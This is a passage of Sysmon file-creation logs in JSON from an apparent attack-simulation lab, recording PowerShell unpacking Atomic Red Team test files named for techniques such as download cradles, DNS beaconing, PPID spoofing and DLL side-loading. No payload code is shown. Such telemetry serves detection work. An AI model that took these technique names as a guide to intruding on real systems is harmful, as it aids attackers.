07:59:07.002","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\x64\\T1056.004.dll","CreationUtcTime":"2020-08-01 07:59:07.002","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4767,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.018\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1059.001\\src\\Invoke-DownloadCradle.ps1\r\nCreationUtcTime: 2020-08-01 07:59:07.018","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.018","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1059.001\\src\\Invoke-DownloadCradle.ps1","CreationUtcTime":"2020-08-01 07:59:07.018","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4768,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.018\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1059.001\\src\\test.ps1\r\nCreationUtcTime: 2020-08-01 07:59:07.018","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.018","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1059.001\\src\\test.ps1","CreationUtcTime":"2020-08-01 07:59:07.018","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4769,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.049\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1071.004\\src\\T1071-dns-beacon.ps1\r\nCreationUtcTime: 2020-08-01 07:59:07.049","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.049","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1071.004\\src\\T1071-dns-beacon.ps1","CreationUtcTime":"2020-08-01 07:59:07.049","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4770,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.049\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1071.004\\src\\T1071-dns-domain-length.ps1\r\nCreationUtcTime: 2020-08-01 07:59:07.049","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.049","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1071.004\\src\\T1071-dns-domain-length.ps1","CreationUtcTime":"2020-08-01 07:59:07.049","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4771,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.064\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1074.001\\src\\Discovery.bat\r\nCreationUtcTime: 2020-08-01 07:59:07.064","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.064","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1074.001\\src\\Discovery.bat","CreationUtcTime":"2020-08-01 07:59:07.064","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4772,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:59:07.080\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1087.002\\src\\AdFind.exe\r\nCreationUtcTime: 2020-08-01 07:59:07.080","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:59:07.080","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1087.002\\src\\AdFind.exe","CreationUtcTime":"2020-08-01 07:59:07.080","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4773,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.143\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1110.003\\src\\parse_net_users.bat\r\nCreationUtcTime: 2020-08-01 07:59:07.143","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.143","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1110.003\\src\\parse_net_users.bat","CreationUtcTime":"2020-08-01 07:59:07.143","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4774,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.158\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1114.001\\src\\Get-Inbox.ps1\r\nCreationUtcTime: 2020-08-01 07:59:07.158","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.158","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1114.001\\src\\Get-Inbox.ps1","CreationUtcTime":"2020-08-01 07:59:07.158","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4775,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.189\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1127.001\\src\\T1127.001.csproj\r\nCreationUtcTime: 2020-08-01 07:59:07.189","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.189","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1127.001\\src\\T1127.001.csproj","CreationUtcTime":"2020-08-01 07:59:07.189","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4776,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.189\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1134.004\\bin\\calc.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.189","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:07.189","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1134.004\\bin\\calc.dll","CreationUtcTime":"2020-08-01 07:59:07.189","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4777,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.189\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1134.004\\src\\PPID-Spoof.ps1\r\nCreationUtcTime: 2020-08-01 07:59:07.189","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.189","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1134.004\\src\\PPID-Spoof.ps1","CreationUtcTime":"2020-08-01 07:59:07.189","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4778,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.252\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.001\\src\\T1218.001.chm\r\nCreationUtcTime: 2020-08-01 07:59:07.252","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.252","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.001\\src\\T1218.001.chm","CreationUtcTime":"2020-08-01 07:59:07.252","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4779,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.283\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.004\\src\\InstallUtilTestHarness.ps1\r\nCreationUtcTime: 2020-08-01 07:59:07.283","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.283","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.004\\src\\InstallUtilTestHarness.ps1","CreationUtcTime":"2020-08-01 07:59:07.283","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4780,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.299\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.005\\src\\T1218.005.hta\r\nCreationUtcTime: 2020-08-01 07:59:07.299","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.299","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.005\\src\\T1218.005.hta","CreationUtcTime":"2020-08-01 07:59:07.299","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4781,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:07.299\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.005\\src\\powershell.ps1\r\nCreationUtcTime: 2020-08-01 07:59:07.299","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:07.299","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.005\\src\\powershell.ps1","CreationUtcTime":"2020-08-01 07:59:07.299","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4782,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.330\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.007\\src\\x64\\T1218.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.330","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:07.330","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.007\\src\\x64\\T1218.dll","CreationUtcTime":"2020-08-01 07:59:07.330","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4783,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.330\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.008\\src\\Win32\\T1218-2.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.330","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:07.330","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.008\\src\\Win32\\T1218-2.dll","CreationUtcTime":"2020-08-01 07:59:07.330","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4784,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.346\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.010\\bin\\AllTheThingsx64.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.346","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:07.346","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.010\\bin\\AllTheThingsx64.dll","CreationUtcTime":"2020-08-01 07:59:07.346","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4785,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.361\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.010\\bin\\AllTheThingsx86.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.361","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 